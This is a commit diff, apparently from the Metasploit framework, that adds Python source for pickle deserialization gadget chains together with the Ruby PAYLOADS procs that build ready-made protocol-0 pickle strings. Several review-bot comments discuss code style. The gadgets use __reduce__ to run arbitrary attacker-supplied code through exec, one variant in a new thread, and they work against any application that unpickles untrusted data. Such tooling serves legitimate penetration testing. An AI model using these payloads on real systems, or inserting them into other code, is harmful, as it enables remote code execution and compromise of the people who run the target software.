Add source code for Python deserialization gadgets
parent
fb073cf21a
commit
e5635c4bfd
|
@ -0,0 +1,9 @@
|
|||
import pickle
|
||||
|
||||
class GadgetChain:
|
||||
def __reduce__(self):
|
||||
return __builtins__.exec, ('#{escaped}',)
|
||||
|
||||
if __name__ == '__main__':
|
||||
pickled = pickle.dumps(GadgetChain(), protocol=0)
|
||||
print(repr(pickled.decode()))
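Review bot: `__builtins__.exec` in `GadgetChain.__reduce__` relies on a CPython implementation detail: `__builtins__` is the builtins module only when the file runs as `__main__`, and is a plain dict in an imported module, where the attribute access raises AttributeError. Adding `import builtins` and returning `builtins.exec, ('#{escaped}',)` works in both cases and should serialize identically, since pickle records the callable's own module and name rather than the expression used to reach it. The same expression appears in `CreateThread.__reduce__` in the second new file. The file also lacks a module docstring; it should say that `'#{escaped}'` is a Ruby interpolation placeholder rather than Python syntax, and that the printed protocol-0 string appears to be the template embedded in the `PAYLOADS` procs of `PythonDeserialization`.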
|
|
@ -0,0 +1,14 @@
|
|||
import pickle
|
||||
import threading
|
||||
|
||||
class CreateThread:
|
||||
def __reduce__(self):
|
||||
return threading.Thread, (None, __builtins__.exec, None, ('#{escaped}',))
|
||||
|
||||
class GadgetChain:
|
||||
def __reduce__(self):
|
||||
return threading.Thread.start, (CreateThread(),)
|
||||
|
||||
if __name__ == '__main__':
|
||||
pickled = pickle.dumps(GadgetChain(), protocol=0)
|
||||
print(repr(pickled.decode()))
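Review bot: The four positional values passed to `threading.Thread` in `CreateThread.__reduce__` are unlabeled, so a reader has to recall the constructor signature to see that `None, __builtins__.exec, None, (...)` fill `group`, `target`, `name` and `args`. A `__reduce__` tuple cannot carry keyword arguments, so a comment above the return such as `# positional: group=None, target=exec, name=None, args=(code,)` would make the intent readable. Short class docstrings would also help, saying that `CreateThread` reduces to the construction of the Thread object and `GadgetChain` reduces to calling `start` on it, since that two-step structure is the only difference from the non-threaded file.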
|
|
@ -6,12 +6,14 @@ module Msf
|
|||
# Python deserialization class
|
||||
class PythonDeserialization
|
||||
# That could be in the future a list of payloads used to exploit the Python deserialization vulnerability.
|
||||
# Payload source files are available in external/source/python_deserialization
|
||||
PAYLOADS = {
|
||||
# this payload will work with Python 3.x targets to execute Python code in place
|
||||
py3_exec: proc do |python_code|
|
||||
escaped = python_code.gsub(/[\\\n\r]/) { |t| "\\u00#{t.ord.to_s(16).rjust(2, '0')}" }
|
||||
%|c__builtin__\nexec\np0\n(V#{escaped}\np1\ntp2\nRp3\n.|
|
||||
end,
|
||||
# this payload will work with Python 3.x targets to execute Python code in a new thread
|
||||
py3_exec_threaded: proc do |python_code|
|
||||
escaped = python_code.gsub(/[\\\n\r]/) { |t| "\\u00#{t.ord.to_s(16).rjust(2, '0')}" }
|
||||
%|c__builtin__\ngetattr\np0\n(cthreading\nThread\np1\nVstart\np2\ntp3\nRp4\n(g1\n(Nc__builtin__\nexec\np5\nN(V#{escaped}\np6\ntp7\ntp8\nRp9\ntp10\nRp11\n.|
|
||||
|
|